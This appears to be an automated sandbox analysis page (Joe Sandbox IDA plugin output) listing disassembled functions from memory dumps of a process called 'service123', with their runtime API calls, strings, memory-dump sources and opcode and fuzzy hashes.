Opcode ID: 78c69222f658405453d5d2a32b13992a705fea83e37c6a38e2f6bcbc8d57290d
Instruction ID: 24126cc4790351d618300bc4586bb38ca82edbbb99291542e37fc7335e351663
Opcode Fuzzy Hash: 78c69222f658405453d5d2a32b13992a705fea83e37c6a38e2f6bcbc8d57290d
Instruction Fuzzy Hash: 79918C756083918BDB318F24C0903EBBBE1BF85714F148A1DE9D997382D739D94ADB82

Function 6CA352F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6CA3548E

Part of subcall function 6CA32F00: fputc.MSVCRT ref: 6CA32FC8

Strings

@, xrefs: 6CA34D17
(null), xrefs: 6CA352F7

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 540d24c53d5852563c8f01ad0416f5a85183e9fe170640c32c8d5b0f43223cd0
Instruction ID: 7c131771a7feb89691b20d201fe674869c7a889a2d21a7cbce807a8a70c93ca1
Opcode Fuzzy Hash: 540d24c53d5852563c8f01ad0416f5a85183e9fe170640c32c8d5b0f43223cd0
Instruction Fuzzy Hash: FA91907160C3658BD7218F29D0A039ABBE1BF85318F14961DE8DCCB781D736D989CB82

Function 6CAB5DB0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6CAB5DEA
wcslen.MSVCRT ref: 6CAB5E7C
wcslen.MSVCRT ref: 6CAB5F0E
strlen.MSVCRT ref: 6CAB5FA0

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: ac21ba90a34f61b6bb660f917c08533722d9e4e23ae6c10a37b6b30fa0997d3d
Instruction ID: 82d3cb0454fac002914e8a9cfc120c242ee657bb9b613901e82b88a3d067c40b
Opcode Fuzzy Hash: ac21ba90a34f61b6bb660f917c08533722d9e4e23ae6c10a37b6b30fa0997d3d
Instruction Fuzzy Hash: C4F18DB0A056058FCB04DFACC1849AEFBF5BF84314B148629E894DB751E735E98ACB81

Function 6CAB55D0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6CAB560A
wcslen.MSVCRT ref: 6CAB569C
wcslen.MSVCRT ref: 6CAB572E
strlen.MSVCRT ref: 6CAB57C0

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: b66a557d2b07573acceb6eb6da27887f47304ad47765fcd623d86a50cff721e0
Instruction ID: 3871f8866664bcc96c431142b2c73e5a997c2d17213112d1d8a691019739d10f
Opcode Fuzzy Hash: b66a557d2b07573acceb6eb6da27887f47304ad47765fcd623d86a50cff721e0
Instruction Fuzzy Hash: 4CF16E74A016068FCB00DFACC1849AEFBF5FF84314B148A59E895DB754E735E98ACB81

Function 007B29B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 007B2A31

Strings

NaN, xrefs: 007B29B1

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: d397a331ec1c13e85beec758156d814082d6e0f8c11d63f135b9748fe83b4d3f
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: 66411771A06215CBDB20DF18C4C4796B7E1AF88700B29C299DD989F24BD33AEC43CB90

Function 6CA33080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6CA33101

Strings

NaN, xrefs: 6CA33081

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: ef70c09e80d0811dcb390a307531560caf364f9e180ec92370d9c7e8d0c7b1f4
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: F34118B1A0A6258BDB10CF19C590785B7E1AF85704B29D399DC8CCF74AD336DC878B90

Function 6CAB4DD0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CAB4E0A
strlen.MSVCRT ref: 6CAB4E8D
strlen.MSVCRT ref: 6CAB4F10
strlen.MSVCRT ref: 6CAB4F93

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: cd9b9b635a05f7f24274556996829bd2059577f1551f1a331caed02a71447d4c
Instruction ID: 23b9444134d25cfae27dd57d63c523823e2724d1cb41f3a47bb42e414f279a71
Opcode Fuzzy Hash: cd9b9b635a05f7f24274556996829bd2059577f1551f1a331caed02a71447d4c
Instruction Fuzzy Hash: FEE14870A056058FCB00DF6CC1C49AEBBF5BF85314B148669E865DBB54E734E98ACF81

Function 6CAB45D0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CAB460A
strlen.MSVCRT ref: 6CAB468D
strlen.MSVCRT ref: 6CAB4710
strlen.MSVCRT ref: 6CAB4793

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 9072656c03c0d6afd6dea3695f485af93024ab7dbca40500e14d23790a046454
Instruction ID: 8d23b3b10626c6ac5c66b327a51272b3ff81b571bb8c96b301d2a9e3003e569a
Opcode Fuzzy Hash: 9072656c03c0d6afd6dea3695f485af93024ab7dbca40500e14d23790a046454
Instruction Fuzzy Hash: 69E15974A056058FC700DFACC1C49AEFBF5AF85314B148669D895EBB54E730E98ACF81

Function 6CA3E1F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6CA3E1FE
strlen.MSVCRT ref: 6CA3E211

Strings

basic_string: construction from null is not valid, xrefs: 6CA3E233

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: 9403a25fb2cc44094928310adff8aef9a59fba29bc020c45905b40cf903f9aa8
Instruction ID: a4f5048e80a6edbbaf8236bde175b042c857861e215d97cc4d1522cced8d930a
Opcode Fuzzy Hash: 9403a25fb2cc44094928310adff8aef9a59fba29bc020c45905b40cf903f9aa8
Instruction Fuzzy Hash: EE116072A091108F8B01FF7DC98145ABBF5BB89214F88DA69D84897308E634DC4DCBE3

Function 007B2F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 007B2E97
fputc.MSVCRT ref: 007B2F07
memset.MSVCRT ref: 007B2FC2

Strings

o, xrefs: 007B2F5E

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: cc1154758bab815d8a7b0a8721374605cf669950e43bd0bfe4bbf115981380cb
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: 73314A71A05205CFCB11CF69C1887EABBF1BF48340F258619D989AB712E738ED42CB94

Function 6CA33616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6CA33567
fputc.MSVCRT ref: 6CA335D7
memset.MSVCRT ref: 6CA33692

Strings

o, xrefs: 6CA3362E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: def2cd30309a6713975e174e7323d6703b9f546c61b97106abf129a1a30519d6
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: B0315C72A0A6258FC700CF29C1A0799B7F1BF48354F199659D9CDEBB01E734E986CB50

Function 007B3424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 007B338F
fputc.MSVCRT ref: 007B33F1

Strings

@, xrefs: 007B342A

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: d5c90533f866fabcd917806ee75b8ad21d45e8620b19dc69af5a24088b753d25
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 25111CB1A04204CBCB15CF28C1C47EA7BE1BF45700F258659ED999F24ADB39ED80CB45

Function 6CA33AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6CA33A5F
fputc.MSVCRT ref: 6CA33AC1

Strings

@, xrefs: 6CA33AFA

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: 541ba086e7e29425a7c293448fd236bad650567766fcd3bf74886c446e961b9b
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: D611CE71D0A2288BCB00CF28C5A07957BB1BF45315F29A659EDDD9FB49D335D882CB44

Function 007B18B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 007B191E

Strings

Unknown error, xrefs: 007B18B2
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 007B18FF

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 4bb3bf1a15bed60f5d0d7517bdd90b2298735666e760f760bc28e18d467ec019
Instruction ID: 039f0c12964ac2ccd282d85df2f1bf207220bf429b94eb6721e9713545665d5c
Opcode Fuzzy Hash: 4bb3bf1a15bed60f5d0d7517bdd90b2298735666e760f760bc28e18d467ec019
Instruction Fuzzy Hash: E701C070408B49DBD740AF19E48855ABFF1FF8A350F868898E5C846269CB3698A8C747

Function 6CA477B1 Relevance: 5.1, APIs: 4, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA477D3

Part of subcall function 6CA94050: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6CA477E6), ref: 6CA940B3

strlen.MSVCRT ref: 6CA47844
strlen.MSVCRT ref: 6CA478B2
strlen.MSVCRT ref: 6CA47926

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: c25fcc0438f0d049b8f95d05ffc7677de4778de0bfd2abb20fc2206808113645
Instruction ID: 8c8c58abc5abead7a1ba11c46a3dc6060a90077501d0500aa799ff243668474a
Opcode Fuzzy Hash: c25fcc0438f0d049b8f95d05ffc7677de4778de0bfd2abb20fc2206808113645
Instruction Fuzzy Hash: 2D513AB4A05A108FCB00EF29C19865DFBF1FF45304F0585ADD8559F721CB35A889CB82

Function 007B6B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,007B6C81,?,?,?,?,?,?,00000000,007B4F24), ref: 007B6B87
InitializeCriticalSection.KERNEL32(?,?,?,?,007B6C81,?,?,?,?,?,?,00000000,007B4F24), ref: 007B6BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,007B6C81,?,?,?,?,?,?,00000000,007B4F24), ref: 007B6BD0
EnterCriticalSection.KERNEL32(?,?,?,?,007B6C81,?,?,?,?,?,?,00000000,007B4F24), ref: 007B6BF8

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: fc8c64d3b1766a8717eb8c345d426451e708cd9c5b0537617112c0ddfc62c35f
Instruction ID: d0569a3415cf0ff6c405286f0a825759df193a32da9a62321308fc4e82aeddfa
Opcode Fuzzy Hash: fc8c64d3b1766a8717eb8c345d426451e708cd9c5b0537617112c0ddfc62c35f
Instruction Fuzzy Hash: D01112F55081448ADB24BB3CA9C979B77B4EB00300F658A25D582C7214F67DEC84C79A

Function 6CA38080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6CA381A1), ref: 6CA380A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6CA381A1), ref: 6CA380E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6CA381A1), ref: 6CA380F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6CA381A1), ref: 6CA38118

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: b0401590f110cc0ad4b6ab1c8d81979e7e6890a1122e3ecc58c369fe1b719049
Instruction ID: 3a1d16baedc87709693176fe949b8f26a6069d748b1f3b9248b1b383326273c4
Opcode Fuzzy Hash: b0401590f110cc0ad4b6ab1c8d81979e7e6890a1122e3ecc58c369fe1b719049
Instruction Fuzzy Hash: 021104B160A1208BDF00BB6C95E625A77F4FB0731CF255927C486D3608E275D4C4C793

Function 007B2000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,007B21D3,?,?,?,?,?,007B17E8), ref: 007B200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,007B21D3,?,?,?,?,?,007B17E8), ref: 007B2035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,007B21D3,?,?,?,?,?,007B17E8), ref: 007B203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,007B21D3,?,?,?,?,?,007B17E8), ref: 007B205C

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 70ccc7f86ad18d6efddfd67293da7959a4dc158b6ef1390065cec8054de7d4e1
Instruction ID: dce1d0679162db3cd1fb40fe1f49707bcbdd048af82fe7fb789a75b42a9bd8c4
Opcode Fuzzy Hash: 70ccc7f86ad18d6efddfd67293da7959a4dc158b6ef1390065cec8054de7d4e1
Instruction Fuzzy Hash: 86F081B55013098FDB207F789888B9A7BB4EB14340B054538DD5487315E73DAC06CBA6

Function 6CA2AB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6CA2AB5E
TlsGetValue.KERNEL32 ref: 6CA2AB85
GetLastError.KERNEL32 ref: 6CA2AB8C
LeaveCriticalSection.KERNEL32 ref: 6CA2ABAC

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 1963ac28b0316a43a34dd4bc3e845de5c26ab1a80b9e6823ab7c3462668faa95
Instruction ID: 40a4fe1287da9aa61de66ce49ac1c7f753b5b26386cf406954d9dc7011e6c07b
Opcode Fuzzy Hash: 1963ac28b0316a43a34dd4bc3e845de5c26ab1a80b9e6823ab7c3462668faa95
Instruction Fuzzy Hash: CBF0C8B6A093118FDB00BF79D6C551A7BB9FB45368B098668DD444730DD630ED48CBA3

